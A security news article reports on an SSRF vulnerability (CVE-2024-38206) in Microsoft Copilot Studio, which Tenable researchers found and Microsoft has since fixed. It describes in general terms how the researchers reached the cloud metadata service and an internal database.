Microsoft’s Copilot Studio Exposes Cloud Data Due to SSRF Bug
August 21, 2024
A serious vulnerability was recently discovered in Microsoft's Copilot Studio tool, which is primarily used for creating custom AI chatbots. This vulnerability, an SSRF (server-side request forgery) bug, allowed researchers to make external HTTP requests, giving them access to sensitive internal services within a cloud environment. This could potentially affect multiple tenants.
The SSRF flaw was discovered by researchers at Tenable. They were able to exploit the vulnerability to access Microsoft’s internal infrastructure. This included the Instance Metadata Service (IMDS) and internal Cosmos DB instances. The flaw was detailed in a blog post by the researchers.
The vulnerability, tracked as CVE-2024-38206 by Microsoft, allows an authenticated attacker to bypass SSRF protection in Microsoft Copilot Studio. This could result in the leakage of sensitive cloud-based information over a network. The security advisory associated with the vulnerability provided these details.
Tenable Security Researcher Evan Grant explained, “An SSRF vulnerability occurs when an attacker is able to influence the application into making server-side HTTP requests to unexpected targets or in an unexpected way.” The researchers tested their exploit by creating HTTP requests to access cloud data and services from multiple tenants.
While no cross-tenant information was immediately accessible, the researchers found that the infrastructure used for this Copilot Studio service was shared among tenants. This means that any impact on the infrastructure could potentially affect multiple customers. “While we don’t know the extent of the impact that having read/write access to this infrastructure could have, it’s clear that because it’s shared among tenants, the risk is magnified,” said Grant.
The researchers also discovered that they could use their exploit to access other internal hosts unrestricted on the local subnet to which their instance belonged. Microsoft swiftly responded to Tenable’s notification of the flaw and it has since been fully mitigated, with no action required on the part of Copilot Studio users.
Copilot Studio was launched by Microsoft last year as a user-friendly tool for creating custom AI assistants or chatbots. These applications allow users to perform a variety of large language model (LLM) and generative AI tasks using data from the Microsoft 365 environment or any other data that the Power Platform, on which the tool is built, ingests.
The SSRF flaw was discovered by the Tenable researchers when they were investigating SSRF vulnerabilities in the APIs for Microsoft’s Azure AI Studio and Azure ML Studio. These vulnerabilities were flagged and patched by Microsoft before the researchers could report them. The researchers then focused their investigation on Copilot Studio to see if it could be exploited in a similar way.
The researchers managed to retrieve managed identity access tokens from the IMDS to use to access internal cloud resources, such as Azure services and a Cosmos DB instance, by combining redirects and SSRF bypasses. They also exploited the flaw to gain read/write access to the database.
The research did not conclusively determine the extent to which the flaw could be exploited to gain access to sensitive cloud data, but it was serious enough to warrant immediate mitigation. The existence of the SSRF flaw should serve as a warning to Copilot Studio users about the potential for attackers to misuse its HTTP-request feature to increase their access to cloud data and resources.
Latest News
- Critical Authentication Bypass Flaw Detected in GitHub Enterprise Server
- Stealthy Msupedge Backdoor Exploits PHP Flaw in Cyber Attack on Taiwanese University
- Security Vulnerability in Azure Kubernetes Services Unveiled by Researchers
- Lazarus Hackers Exploit Windows Driver Zero-Day to Install Rootkit
- CISA Issues Warning Over Critical Jenkins RCE Bug Being Leveraged in Ransomware Attacks
Like what you see?
Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.